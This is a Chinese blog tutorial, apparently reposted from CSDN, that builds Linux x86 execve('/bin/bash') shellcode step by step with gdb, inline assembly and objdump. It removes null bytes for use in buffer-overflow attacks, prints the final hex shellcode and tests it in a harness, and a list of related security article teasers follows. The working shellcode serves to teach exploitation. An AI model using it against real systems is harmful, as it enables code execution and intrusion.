elite

基本shellcode提取方法

转载请注明出处：http://blog.csdn.net/wangxiaolong_china

这里，我们将编写一个非常简单的shellcode，它的功能是得到一个命令行。我们将从该shellcode的C程序源码开始，逐步构造并提取shellcode。

该shellcode的C程序源码为：

root@linux:~/pentest# cat shellcode.c
#include 

int main(int argc, char **argv) {

    char *name[2];
    name[0] = "/bin/bash";
    name[1] = NULL;

    execve(name[0], name, NULL);

    return 0;
}

为了避免链接干扰，静态编译该shellcode，命令为：

root@linux:~/pentest# gcc -static -g -o shellcode shellcode.c

下面使用gdb调试并分析一下shellcode程序：

root@linux:~/pentest# gdb shellcode
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /root/pentest/shellcode...done.
(gdb) disass main
Dump of assembler code for function main:
   0x080482c0 <+0>:	push   %ebp
   0x080482c1 <+1>:	mov    %esp,%ebp
   0x080482c3 <+3>:	and    {1}xfffffff0,%esp
   0x080482c6 <+6>:	sub    {1}x20,%esp
   0x080482c9 <+9>:	movl   {1}x80ae428,0x18(%esp)
   0x080482d1 <+17>:	movl   {1}x0,0x1c(%esp)
   0x080482d9 <+25>:	mov    0x18(%esp),%eax
   0x080482dd <+29>:	movl   {1}x0,0x8(%esp)
   0x080482e5 <+37>:	lea    0x18(%esp),%edx
   0x080482e9 <+41>:	mov    %edx,0x4(%esp)
   0x080482ed <+45>:	mov    %eax,(%esp)
   0x080482f0 <+48>:	call   0x8052f10 
   0x080482f5 <+53>:	mov    {1}x0,%eax
   0x080482fa <+58>:	leave  
   0x080482fb <+59>:	ret    
End of assembler dump.

根据程序反汇编得到的代码分析，在call指令执行之前，函数堆栈的使用情况如下图所示：

我们用gdb调试运行shellcode，看我们上面的分析是否完全正确。

(gdb) b main
Breakpoint 1 at 0x80482c9: file shellcode.c, line 6.
(gdb) b *main+48
Breakpoint 2 at 0x80482f0: file shellcode.c, line 9.
(gdb) r
Starting program: /root/pentest/shellcode 

Breakpoint 1, main (argc=1, argv=0xbffff474) at shellcode.c:6
6		name[0] = "/bin/bash";
(gdb) x/s 0x80ae428
0x80ae428:	 "/bin/bash"
(gdb) c
Continuing.

Breakpoint 2, 0x080482f0 in main (argc=1, argv=0xbffff474) at shellcode.c:9
9		execve(name[0], name, NULL);
(gdb) x/4bx $ebp-40
0xbffff3b0:	0x28	0xe4 	0x0a 	0x08
(gdb) x/4bx $ebp-36
0xbffff3b4:	0xc8	    0xf3	    0xff 	0xbf
(gdb) x/4bx $ebp-32
0xbffff3b8:	0x00	0x00	0x00	0x00
(gdb) x/4bx $ebp-12
0xbffff3cc:	0x00	0x00	0x00	0x00
(gdb) x/4bx $ebp-16
0xbffff3c8:	0x28	0xe4 	0x0a	    0x08
(gdb)

从调试结果看，上面关于call指令前的堆栈的分析是完全正确的。

即main函数的关键在于调用了execve函数，在调试中我们可以看到在调用该函数前将三个参数按照从右往左的顺序依次压入堆栈中。首先压入0x0（即NULL参数），然后是指向0x80ae428的指针，最后压入地址0x80ae428。

接下来，我们反汇编execve函数，看看该函数的功能是如何实现的。

(gdb) disass execve
Dump of assembler code for function execve:
   0x08052f10 <+0>:	push   %ebp
   0x08052f11 <+1>:	mov    %esp,%ebp
   0x08052f13 <+3>:	mov    0x10(%ebp),%edx
   0x08052f16 <+6>:	push   %ebx
   0x08052f17 <+7>:	mov    0xc(%ebp),%ecx
   0x08052f1a <+10>:	mov    0x8(%ebp),%ebx
   0x08052f1d <+13>:	mov    {1}xb,%eax
   0x08052f22 <+18>:	call   *0x80cf098
   0x08052f28 <+24>:	cmp    {1}xfffff000,%eax
   0x08052f2d <+29>:	ja     0x8052f32 
   0x08052f2f <+31>:	pop    %ebx
   0x08052f30 <+32>:	pop    %ebp
   0x08052f31 <+33>:	ret    
   0x08052f32 <+34>:	mov    {1}xffffffe8,%edx
   0x08052f38 <+40>:	neg    %eax
   0x08052f3a <+42>:	mov    %gs:0x0,%ecx
   0x08052f41 <+49>:	mov    %eax,(%ecx,%edx,1)
   0x08052f44 <+52>:	or     {1}xffffffff,%eax
   0x08052f47 <+55>:	jmp    0x8052f2f 
End of assembler dump.

可以看到该函数的核心是“call *0x80cf098”这条指令。为了查看该call指令具体调用的函数名称，继续调试如下:

(gdb) b *execve+18
Breakpoint 1 at 0x8052f22
(gdb) r
Starting program: /root/pentest/shellcode 

Breakpoint 1, 0x08052f22 in execve ()
(gdb) stepi
0x00110414 in __kernel_vsyscall ()
(gdb) stepi
process 1870 is executing new program: /bin/bash
root@linux:/root/pentest# exit
exit

Program exited normally.
(gdb)

可以看到，该call指令调用了__kernel_vsyscall ()这个内核函数。又因为__kernel_vsyscall的设计目标是代替int 80, 也就是下面两种方式应该是等价的：

    /* int80 */                           /* __kernel_vsyscall */
     movl

{1}

_NR_getpid, %eax movl

{1}

_NR_getpid, %eax int {1}x80 call __kernel_vsyscall /* %eax=getpid() */ /* %eax=getpid() %/

同时，我们可以借鉴以前版本gcc编译后反汇编的代码查看execve的实现细节：

[scz@ /home/scz/src]> gdb shellcode
GNU gdb 4.17.0.11 with Linux support
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble main <-- -- -- 输入
Dump of assembler code for function main:
0x80481a0 :       pushl  %ebp
0x80481a1 :     movl   %esp,%ebp
0x80481a3 :     subl   {1}x8,%esp
0x80481a6 :     movl   {1}x806f308,0xfffffff8(%ebp)
0x80481ad :    movl   {1}x0,0xfffffffc(%ebp)
0x80481b4 :    pushl  {1}x0
0x80481b6 :    leal   0xfffffff8(%ebp),%eax
0x80481b9 :    pushl  %eax
0x80481ba :    movl   0xfffffff8(%ebp),%eax
0x80481bd :    pushl  %eax
0x80481be :    call   0x804b9b0 <__execve>
0x80481c3 :    addl   {1}xc,%esp
0x80481c6 :    xorl   %eax,%eax
0x80481c8 :    jmp    0x80481d0
0x80481ca :    leal   0x0(%esi),%esi
0x80481d0 :    leave
0x80481d1 :    ret
End of assembler dump.
(gdb) disas __execve <-- -- -- 输入
Dump of assembler code for function __execve:
0x804b9b0 <__execve>:   pushl  %ebx
0x804b9b1 <__execve+1>: movl   0x10(%esp,1),%edx
0x804b9b5 <__execve+5>: movl   0xc(%esp,1),%ecx
0x804b9b9 <__execve+9>: movl   0x8(%esp,1),%ebx
0x804b9bd <__execve+13>:        movl   {1}xb,%eax
0x804b9c2 <__execve+18>:        int    {1}x80
0x804b9c4 <__execve+20>:        popl   %ebx
0x804b9c5 <__execve+21>:        cmpl   {1}xfffff001,%eax
0x804b9ca <__execve+26>:        jae    0x804bcb0 <__syscall_error>
0x804b9d0 <__execve+32>:        ret
End of assembler dump.

即，execve的核心是一个软中断int $0x80。接下来，查看一下在软中断之前，各寄存器的内容，及其意义：

(gdb) disass execve
Dump of assembler code for function execve:
   0x08052f10 <+0>:	push   %ebp
   0x08052f11 <+1>:	mov    %esp,%ebp
   0x08052f13 <+3>:	mov    0x10(%ebp),%edx
   0x08052f16 <+6>:	push   %ebx
   0x08052f17 <+7>:	mov    0xc(%ebp),%ecx
   0x08052f1a <+10>:	mov    0x8(%ebp),%ebx
   0x08052f1d <+13>:	mov    {1}xb,%eax
   0x08052f22 <+18>:	call   *0x80cf098
   0x08052f28 <+24>:	cmp    {1}xfffff000,%eax
   0x08052f2d <+29>:	ja     0x8052f32 
   0x08052f2f <+31>:	pop    %ebx
   0x08052f30 <+32>:	pop    %ebp
   0x08052f31 <+33>:	ret    
   0x08052f32 <+34>:	mov    {1}xffffffe8,%edx
   0x08052f38 <+40>:	neg    %eax
   0x08052f3a <+42>:	mov    %gs:0x0,%ecx
   0x08052f41 <+49>:	mov    %eax,(%ecx,%edx,1)
   0x08052f44 <+52>:	or     {1}xffffffff,%eax
   0x08052f47 <+55>:	jmp    0x8052f2f 
End of assembler dump.
(gdb) b *execve+18
Breakpoint 1 at 0x8052f22
(gdb) r
Starting program: /root/pentest/shellcode 

Breakpoint 1, 0x08052f22 in execve ()
(gdb) i r 
eax            0xb	11
ecx            0xbffff3c8	-1073744952
edx            0x0	0
ebx            0x80ae428	134931496
esp            0xbffff3a4	0xbffff3a4
ebp            0xbffff3a8	0xbffff3a8
esi            0x8048a40	134515264
edi            0xbffff42d	-1073744851
eip            0x8052f22	0x8052f22 
eflags         0x282	[ SF IF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/x 0xbffff3c8
0xbffff3c8:	 0x80ae428
(gdb) x/s 0x80ae428
0x80ae428:	 "/bin/bash"
(gdb) c
Continuing.
process 1981 is executing new program: /bin/bash
root@linux:/root/pentest# exit
exit

Program exited normally.
(gdb)

可以看到，eax保存execve的系统调用号11，ebx保存name[0]（即“/bin/bash”），ecx保存name这个指针，edx保存0（即NULL），这样执行软中断之后，就能得到shell了。接下来，有了以上分析，我们就可以编写自己的shellcode了，同是验证上面分析结果的正确性。

下面，我们用C语言内嵌汇编的方式，构造shellcode，具体代码如下。有一点要注意，Linux X86默认的字节序是little-endian，所以压栈的字符串要注意顺序。（如“/bin/bash”,其16进制表示为0x2f 0x62 0x69 0x6e 0x2f 0x62 0x61 0x73 0x68，在little-endian模式下，其表示为0x68 0x73 0x61 0x62 0x2f 0x6e 0x69 0x62 0x2f，其中有个小技巧，不足4字节的用0x2f(即“/”)补足）。

root@linux:~/pentest# cat shellcode_asm.c
#include 

int main(int argc, char **argv) {

    asm(
            "mov $0x0,%edx;        \n\t"
            "push %edx;        \n\t"
            "push $0x68736162;    \n\t"
            "push $0x2f6e6962;    \n\t"
            "push $0x2f2f2f2f;    \n\t"
            "mov %esp,%ebx;        \n\t"
            "push %edx;        \n\t"
            "push %ebx;        \n\t"
            "mov %esp,%ecx;        \n\t"
            "mov $0xb,%eax;        \n\t"
            "int $0x80;        \n\t"
            );

            return 0;
}

root@linux:~/pentest# gcc -g -o shellcode_asm shellcode_asm.c
root@linux:~/pentest# ./shellcode_asm 
root@linux:/root/pentest# exit
exit
root@linux:~/pentest#

通过编译执行，我们成功的得到了shell命令行。在编写内嵌汇编时，一定要注意格式问题；当然，最重要的是在执行软中断前一定要使各寄存器的值符合我们之前分析的结果。

此时，编写工作还没有完结，要记住我们的最终目的是得到ShellCode，也就是一串汇编指令；而对于strcpy等函数造成的缓冲区溢出攻击，会认为0是一个字符串的终结，那么ShellCode如果包含0就会被截断，导致溢出失败。

用objdump反汇编这个shellcode，并查看是否包含0，命令为：

objdump –d shellcode_asm | less

该命令将会反汇编所有包含机器指令的section，请自行找到main段：

08048394 :
 8048394:    55                       push   %ebp
 8048395:    89 e5                   mov    %esp,%ebp
 8048397:    ba 00 00 00 00      mov    {1}x0,%edx
 804839c:    52                       push   %edx
 804839d:    68 62 61 73 68      push  {1}x68736162
 80483a2:    68 62 69 6e 2f       push   {1}x2f6e6962
 80483a7:    68 2f 2f 2f 2f        push   {1}x2f2f2f2f
 80483ac:    89 e3                    mov    %esp,%ebx
 80483ae:    52                        push   %edx
 80483af:    53                        push   %ebx
 80483b0:    89 e1                    mov    %esp,%ecx
 80483b2:    b8 0b 00 00 00       mov    {1}xb,%eax
 80483b7:    cd 80                    int    {1}x80
 80483b9:    b8 00 00 00 00       mov    {1}x0,%eax
 80483be:    5d                        pop    %ebp
 80483bf:    c3                        ret

从反汇编结果可以看到，有两条指令“mov $0x0,%edx”和“mov $0xb,%eax”包含0，需要变通一下。我们分别使用“x0r %edx,%edx”和“lea 0xb(%edx),%eax”来替换。

root@linux:~/pentest# cat shellcode_asm.c
#include 

int main(int argc, char **argv) {
    
    __asm__
    ("                \
         xor %edx,%edx;        \
        push %edx;        \
        push {1}x68736162;    \
        push {1}x2f6e6962;    \
        push {1}x2f2f2f2f;    \
        mov %esp,%ebx;        \
        push %edx;       \
        push %ebx;        \
        mov %esp,%ecx;        \
        lea 0xb(%edx),%eax;    \
        int {1}x80;        \
     ");

    return 0;
}
root@linux:~/pentest# gcc -g -o shellcode_asm shellcode_asm.c
root@linux:~/pentest# ./shellcode_asm 
root@linux:/root/pentest# exit
exit
root@linux:~/pentest#

运行没有问题，再看看这个shellcode有没有包含0：

08048394 :
 8048394:    55                           push   %ebp
 8048395:    89 e5                       mov    %esp,%ebp
 8048397:    31 d2                       xor    %edx,%edx
 8048399:    52                           push   %edx
 804839a:    68 62 61 73 68           push   {1}x68736162
 804839f:    68 62 69 6e 2f            push   {1}x2f6e6962
 80483a4:    68 2f 2f 2f 2f             push   {1}x2f2f2f2f
 80483a9:    89 e3                        mov    %esp,%ebx
 80483ab:   52                             push   %edx
 80483ac:    53                            push   %ebx
 80483ad:    89 e1                        mov    %esp,%ecx
 80483af:    8d 42 0b                    lea    0xb(%edx),%eax
 80483b2:    cd 80                        int    {1}x80
 80483b4:    b8 00 00 00 00            mov    {1}x0,%eax
 80483b9:    5d                            pop    %ebp
 80483ba:    c3                            ret    
 80483bb:    90                            nop
 80483bc:    90                            nop
 80483bd:    90                            nop
 80483be:    90                            nop
 80483bf:    90                       nop

可以看到，所有曾经出现0的指令，在进行指令替换之后，所有的0全部消除了。注意，我们只提取嵌入汇编部分的指令的二进制代码作为我们的shellcode使用，即从0x8048397到0x80483b2地址之间的指令。

即，我们生成的shellcode为：

\x31\xd2\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80

root@linux:~/pentest# cat test_shellcode.c
#include 

char shellcode[] = 
"\x31\xd2\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f"
"\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

int main(int argc, char **argv) {
    __asm__
    ("                \
        call shellcode;        \
     ");
}
root@linux:~/pentest# gcc -g -o test_shellcode test_shellcode.c
root@linux:~/pentest# ./test_shellcode 
Segmentation fault
root@linux:~/pentest# gcc -z execstack -g -o test_shellcode test_shellcode.c
root@linux:~/pentest# ./test_shellcode 
root@linux:/root/pentest# exit
exit
root@linux:~/pentest#

可以看到，shellcode提取成功！

你可能感兴趣的:(缓冲区溢出)

stringstream类讲解 Adward.xi C++数据结构刷题开发语言 C++
定义了三个类：istringstream、ostringstream和stringstream，分别用来进行流的输入、输出和输入输出操作。本文以stringstream为主，介绍流的输入和输出操作。主要用来进行数据类型转换，由于使用string对象来代替字符数组（snprintf方式），避免了缓冲区溢出的危险；而且，因为传入参数和目标对象的类型会被自动推导出来，所以不存在错误的格式化符号的问题。简
深入剖析二进制漏洞：原理、类型与利用方法天域网络科技安全网络 web安全
目录引言1.1二进制漏洞简介1.2二进制漏洞的常见类型1.3二进制漏洞在CTF中的重要性缓冲区溢出2.1缓冲区溢出的基本原理2.2栈溢出攻击2.2.1EIP覆盖与ROP攻击2.2.2栈溢出的防御机制2.3堆溢出攻击2.3.1堆管理机制与漏洞利用2.3.2堆溢出的利用技巧格式化字符串漏洞3.1格式化字符串漏洞的原理3.2漏洞利用：信息泄露与任意写3.3格式化字符串漏洞的防御措施整数溢出4.1整数溢出
c++ stringstream ss() WeSiGJ C++c++字符串算法
定义了三个类：istringstream、ostringstream和stringstream，分别用来进行流的输入、输出和输入输出操作。本文以stringstream为主，介绍流的输入和输出操作。主要用来进行数据类型转换，由于使用string对象来代替字符数组（snprintf方式），就避免缓冲区溢出的危险；而且，因为传入参数和目标对象的类型会被自动推导出来，所以不存在错误的格式化符的问题。简单
【快速上手C语言】第十七章：安全编程与最佳实践 - C语言中的风险防范与防御性编程 Seraphina_Lily 快速上手C语言 c语言安全开发语言
在嵌入式系统和底层开发中，安全性是至关重要的。C语言由于其灵活性和高效性，广泛应用于系统级编程。然而，C语言也容易导致各种安全问题，如缓冲区溢出、整数溢出等。这些问题如果不加以重视，可能会带来严重的安全隐患。本文将探讨C语言中的常见安全问题，介绍安全编码的最佳实践与防御性编程技巧，并讨论代码审查和静态分析工具的使用，最后深入探讨嵌入式系统中的安全性考虑。1.C语言中的常见安全问题C语言的设计允许直
C 简记（随时更新）陈俊帆--嵌入式软件工程师 c语言开发语言
strlen函数的行为：strlen函数计算字符串的长度，直到遇到第一个空字符（\0）为止。如果ver数组没有被初始化为一个以空字符结尾的字符串，strlen的行为将是未定义的，因为它会继续读取内存直到找到一个\0为止，这可能导致缓冲区溢出或读取到不应该访问的内存区域。示例：charver[4]="";if(strlen(ver)==0){printf("0\r\n");}else{printf(
C 语言string.h常见函数用法爱掉发的小李 c语言数据结构算法学习
字符串处理函数中一些常用函数的使用方法和注意事项。1.strcpy()函数：用于将字符串复制到另一个字符串中。chardestination[100];charsource[]="Hello,World!";strcpy(destination,source);注意事项：确保目标字符串的缓冲区足够大，以容纳源字符串的内容。否则，可能会导致缓冲区溢出。2.strlen()函数：用于计算字符串的长度。
Rust可以解决的常见问题 TE-茶叶蛋 Rust rust 开发语言后端
文章目录前言1.悬垂指针（DanglingPointers）修复悬垂指针问题2.缓冲区溢出（BufferOverflow）那么是什么是缓冲区溢出？rust处理缓冲区溢出问题3.数据竞争（DataRaces）4.空指针（NullPointers）5.内存泄漏（MemoryLeaks）6.并发安全（ConcurrencySafety）总结前言Rust学习系列，随着对rust的了解，发现rust解决的问
题目 1031: [编程入门]自定义函数之字符串反转进击的小童 C语言网题目 c语言 C语言网训练题
问题描述：写一函数，使输入的一个字符串按反序存放，在主函数中输入并输出反序后的字符串（不包含空格）。样例输入：123456abcdef样例输出：fedcba654321代码分析：这段代码的主要功能是接受用户输入的字符串，然后反转该字符串并输出，但是在输出过程中会跳过空格符和换行符。注意问题：以下是应该注意的问题：1.缺乏错误检查：代码中如果没有对输入字符串长度进行检查，可能导致缓冲区溢出。在实际应
kali系统概述、nmap扫描应用、john破解密码、抓包概述、以太网帧结构、抓包应用、wireshark应用、nginx安全加固、Linux系统加固 Mick方安全 wireshark linux
目录kalinmap扫描使用john破解密码抓包封装与解封装网络层数据包结构TCP头部结构编辑UDP头部结构实施抓包安全加固nginx安全防止缓冲区溢出Linux加固kali实际上它就是一个预安装了很多安全工具的DebianLinux[root@myhost~]#kaliresetkaliresetOK.该虚拟机系统用户名为:kali,密码为:kali基础配置$ipas#查看网络IP地址，本例中查
网络安全之DOS攻击 wulanlin 网络安全安全 web 网络前端
简介概念：DoS攻击通常是利用传输协议的漏洞、系统存在的漏洞、服务的漏洞，对目标系统发起大规模的进攻，用超出目标处理能力的海量数据包消耗可用系统资源、带宽资源等，或造成程序缓冲区溢出错误，致使其无法处理合法用户的正常请求，无法提供正常服务，最终致使网络服务瘫痪，甚至引起系统死机。这是破坏攻击目标正常运行的一种“损人不利己”的攻击手段。最常见的DoS攻击行为有网络带宽攻击和连通性攻击。带宽攻击指以极
django学习——常见的网站攻击的三种方式：sql注入、xss、csrf geerniya django django sql注入 csrf
摘要：对Web服务器的攻击也可以说是形形色色、种类繁多，常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。本文结合WEBTOP10漏洞中常见的SQL注入，跨站脚本攻击(XSS)，跨站请求伪造（CSRF）攻击的产生原理，介绍相应的防范方法。关键字：SQL注入，XSS，CSRF1.SQL注入所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或
C++ 内存模型 zaizai1007 C++c++
C++内存模型-MrYun-博客园(cnblogs.com)内存区域C++内存分为5个区域：堆heap：由new分配的内存块，其释放编译器不去管，由我们程序自己控制（一个new对应一个delete）。如果程序员没有释放掉，在程序结束时OS会自动回收。涉及的问题：“缓冲区溢出”、“内存泄露”栈stack：是那些编译器在需要时分配，在不需要时自动清除的存储区。存放局部变量、函数参数。存放在栈中的数据只
深入探索：缓冲区溢出漏洞及其防范策略白猫a~ 网络安全网络安全 web安全网络安全
在网络安全的广阔领域中，缓冲区溢出漏洞一直是一个重要的议题。这种漏洞，如果被恶意利用，可能会导致严重的安全问题，包括数据泄露、系统崩溃，甚至可能被攻击者利用来执行恶意代码。在本文中，我们将深入探讨缓冲区溢出漏洞的原理、危害以及如何防范这种漏洞。首先，我们来理解一下什么是缓冲区溢出漏洞。缓冲区是计算机内存中用于存储数据的区域。当程序试图将数据放入内存中的某个位置时，如果没有足够的空间，就会发生缓冲区
C++服务器端开发（9）:安全性考虑 Galaxy银河 C++更多语法计算机 /人工智能 c++开发语言
输入验证：C++服务器应该对所有的输入数据进行验证和过滤，以防止恶意用户输入造成的攻击，比如通过输入特殊字符来进行SQL注入或者跨站脚本攻击等。可以使用正则表达式、输入过滤和限制输入长度等方法来实现输入验证。代码审查：通过仔细审查服务器端的代码，查找潜在的漏洞和安全问题，如缓冲区溢出、空指针引用、代码注入等。及时修复漏洞和问题，并进行代码审计。认证和授权：服务器需要对用户进行认证和授权，以确保只有
网络入侵检测与UDP包捕 wgochina2012 网络 socket 路由器 internet tcp 服务器
获分析—缓冲区溢出攻击摘要自从计算机问世以来，安全问题就一直存在着，使用者也一直未给予足够的重视，结果大量连接到Internet上的计算机暴露在愈来愈频繁的攻击中。随着信息技术日新月异的发展，人类正在进入以网络为主的信息时代，基于Internet开展的电子商务已逐渐成为人们进行商务活动的新模式。越来越多的人通过Internet进行商务活动，电子商务的发展前景十分诱人，但由于Internet的开放性
【目录】CSAPP的实验简介与解法总结（已包含Attack/Link/Architecture/Cache） BU冰糖雪梨里的梨PT 《CS:APP》的实验 csapp 深入理解计算机系统 15213
文章目录AttackLab（缓冲区溢出实验）对应书上Chap3LinkLab（链接实验）对应书上Chap7ArchitectureLab（体系结构实验）对应书上Chap4-5CacheLab（缓存实验）对应书上Chap6AttackLab（缓冲区溢出实验）对应书上Chap3大意待攻击的程序中使用了gets函数获取用户输入，你作为攻击者要输入一些内容来转移程序的控制权。收获理解了gets函数为什么被
CTF比赛二进制 PWN方入门：基础知识点精讲徐小潜学习学习方法经验分享安全网络安全笔记系统安全
目录二进制基础hack可执行文件小端序两种汇编格式栈溢出基础函数调用栈栈的结构相关寄存器函数调用栈缓冲区溢出PWN工具软件工具Python库Linux系统工具相关值利用PWN步骤以ret2text(32位)为例觉得这篇文章不错的话，欢迎收藏、点赞、评论，期待你的关注！Reverse入门博客推荐：CTF比赛Reverse逆向方向：入门规划精讲-CSDN博客PWN入门学习视频推荐：XMCVECTFPw
网络安全威胁——缓冲区溢出攻击不会写代码的小彭服务器 linux 网络
1.什么是缓冲区溢出（1）缓冲区缓冲区是一块连续的计算机内存区域，用于在将数据从一个位置移到另一位置时临时存储数据。这些缓冲区通常位于RAM内存中，可保存相同数据类型的多个实例，如字符数组。计算机经常使用缓冲区来帮助提高性能，大多数现代硬盘驱动器都利用缓冲优势来有效地访问数据，并且许多在线服务也使用缓冲区。例如，在线视频传送服务经常使用缓冲区以防止中断。流式传输视频时，视频播放器一次下载并存储20
黑客攻击最常见类型汇总，文末附教学！程序员鑫港网络安全黑客黑客黑客攻击网络安全网络安全 web安全系统安全
黑客（Hcaker）是指具有较高计算机水平的计算机爱好者，他们以研究探索操作系统、软件编程、网络技术为兴趣，并时常对操作系统或其他网络发动攻击。其攻击方式多种多样，下面将讲解几种常见的攻击方式文章目录1．系统入侵攻击1）口令攻击2）漏洞攻击2．Web页欺骗3．木马攻击4．拒绝服务攻击5．缓冲区溢出攻击6．后门攻击1．系统入侵攻击入侵系统是黑客攻击的主要手段之一，其主要目的是取得系统的控制权。系统入
安全防御------网络安全基础知识点菜鸟Zyz 安全防御安全
目录一、网络安全常识及术语二、为什么出现网络安全问题？1.网络的脆弱性2.网络环境的开放性3.协议栈自身的脆弱性4.操作系统自身的漏洞5.缓冲区溢出攻击编辑6.终端的脆弱性及常见攻击三、什么样的网络是安全的？网络安全要素：1.保密性2.完整性3.可用性4.可控性5.不可否认性四、威胁模型一、网络安全常识及术语1.资产：任何对组织业务具有价值的信息资产，包括计算机硬件、通信设施、IT环境、数据库、软
端口经常被攻击怎么办？德迅云安全-甲锵服务器网络安全
端口攻击是指攻击者利用开放的端口进行攻击的行为。攻击者通过扫描目标主机的端口，确定哪些端口是开放的，然后利用已知的漏洞、密码猜测等方式攻击这些开放的端口。常见的端口攻击有以下几种：1.端口扫描攻击：使用端口扫描工具扫描目标主机的开放端口，以发现潜在的安全漏洞。2.端口溢出攻击：利用缓冲区溢出漏洞，向目标主机的特定端口发送大量数据，导致目标主机崩溃或执行恶意代码。3.端口欺骗攻击：通过伪造IP地址和
【二进制漏洞】缓冲区溢出漏洞星盾网安安全
天命：好像复现成功了，又好像没有完全成功学习视频：抓住漏洞！缓冲区溢出漏洞利用实例，如何利用溢出执行ShellCode_哔哩哔哩_bilibili漏洞复现实验环境：kali（其实啥都试过，windows，ubuntu16，云服务器，效果都是一样）先写一个.c文件，里面写一个不会被调用的函数gcca.c#编译成可执行文件gdba.out#进入调式查看main函数的反汇编代码这一行应该就是缓冲区了，1
【Pwn | CTF】BUUCTF rip1 星盾网安安全
天命：第一个pwn的入门题这题考的是：缓冲区溢出漏洞打开IDA，发现函数里有一个fun函数，能直接调用系统函数而main中没有调用这个函数我们要做的就是利用这个函数进行调用系统函数这文件是在靶机，就是靶机存在这个漏洞，我们要攻击他那么来看一下main，发现很简单，只有一个gets获取输入，存到s数组变量里看一下双击s变量，缓冲区大小知道了缓冲区大小，下一步就要知道fun函数的入口地址从汇编上看，是
stringstream实用用法总结一只蓝色小鲨鱼总结的语法计算机考研复试上机题考研算法 c++数据结构
简介:定义了三个类：istringstream、ostringstream和stringstream，分别用来进行流的输入、输出和输入输出操作。本文以stringstream为主，介绍流的输入和输出操作。主要用来进行数据类型转换，由于使用string对象来代替字符数组（snprintf方式），避免了缓冲区溢出的危险；而且，因为传入参数和目标对象的类型会被自动推导出来，所以不存在错误的格式化符号的问
Linux底层函数库glibc漏洞核查整改指引马哥小师哥
#一、**漏洞概要**近日，Linux底层函数glibc的DNS客户端解析器被发现存在基于栈的缓冲区溢出漏洞。攻击者可借助特制的域名、DNS服务器或中间人攻击利用该漏洞执行任意代码，甚至控制整个系统。#二、**漏洞原理**攻击者可在恶意域名服务器创建恶意的DNS域名，诱骗用户访问查找恶意域名，并最终得到恶意服务器的buffer-busting响应。该域名被嵌入服务器日志中，一旦解析就会触发远程代码
网络安全之防御保护概述 yjx20030812 安全
概念：一个由信息基础设施组成的互相依赖的网络。我国官方文件定义：网络空间为继海、陆、空、天以外的第五大人类活动领域。网络安全发展过程：通网络安全之防御保护概述讯保密阶段---->计算机安全阶段---->信息系统安全---->网络空间安全APT攻击---高级持续性威胁常见安全风险：应用层：漏洞、缓冲区溢出攻击。web应用的攻击、病毒以及木马......传输层：TCP欺骗、TCP拒绝服务、UDP拒绝服
【无标题】 yjx20030812 安全
网络空间安全---->Cyberspace概念：一个由信息基础设施组成的互相依赖的网络。（2003年美国提出的）我国官方文件定义：网络空间为继海、陆、空、天以外的第五大人类活动领域。网络安全发展过程：通讯保密阶段---->计算机安全阶段---->信息系统安全---->网络空间安全APT攻击---高级持续性威常见安全风险：应用层：漏洞、缓冲区溢出攻击。web应用的攻击、病毒以及木马......传输层
Attack Lab：Phase1~Phase5【缓冲区溢出实验】 BU冰糖雪梨里的梨PT 《CS:APP》的实验缓冲区溢出 csapp attack lab 汇编
注：本实验所用文件不是csapp官网给出的，是学校下发的。可以参考我的思路。phase1本阶段目标是使getbuf调用结束后，控制权交给touch1函数。则我们要知道两件事：一是缓冲区大小，二是touch1在虚拟内存中的位置。用objdump-dctarget>ctarget.s命令，反汇编ctarget代码。用本机安装的vs打开，方便阅读。如下图，缓冲区大小为0x38字节，即56字节。如下图，t
深入了解c语言字符串 2 甜美的江 c 语言 c语言 c#开发语言
深入了解c语言字符串2一使用scanf进行字符串的输入：1.1输入单词（不包含空格）：1.2输入带空格的整行文本：1.3处理输入缓冲区：1.4注意安全性：二使用printf字符串的输出：三输入输出中的一些常见问题和注意事项3.1.缓冲区溢出：3.2空白字符的处理：3.3字符串结束标志：3.4字符串长度的处理：3.5格式化字符串的处理：3.6动态内存分配：前言Hello大家好！我是甜美的江。本博客将
缓冲区溢出漏洞：理解与防范白猫a~ 网络安全 web安全安全网络 linux 服务器网络安全
缓冲区溢出漏洞是计算机安全领域中一个重要的议题，它涉及到编程语言、操作系统和网络通信等多个方面。为了更好地理解这个问题，我们需要先了解什么是缓冲区以及缓冲区溢出漏洞是如何产生的。首先，我们来了解一下什么是缓冲区。在计算机中，缓冲区是一个用于存储数据的区域。在许多程序中，特别是在涉及到输入/输出操作或网络通信的程序中，缓冲区用于存储临时数据。这些数据可以是用户输入的数据、从文件读取的数据或通过网络接
关于旗正规则引擎下载页面需要弹窗保存到本地目录的问题何必如此 jsp 超链接文件下载窗口
生成下载页面是需要选择“录入提交页面”，生成之后默认的下载页面<a>标签超链接为：<a href="<%=root_stimage%>stimage/image.jsp?filename=<%=strfile234%>&attachname=<%=java.net.URLEncoder.encode(file234filesourc
【Spark九十八】Standalone Cluster Mode下的资源调度源代码分析 bit1129 cluster
在分析源代码之前，首先对Standalone Cluster Mode的资源调度有一个基本的认识：首先，运行一个Application需要Driver进程和一组Executor进程。在Standalone Cluster Mode下，Driver和Executor都是在Master的监护下给Worker发消息创建(Driver进程和Executor进程都需要分配内存和CPU，这就需要Maste
linux上独立安装部署spark daizj linux 安装 spark 1.4 部署
下面讲一下linux上安装spark，以 Standalone Mode 安装 1）首先安装JDK 下载JDK：jdk-7u79-linux-x64.tar.gz ，版本是1.7以上都行，解压 tar -zxvf jdk-7u79-linux-x64.tar.gz 然后配置 ~/.bashrc&nb
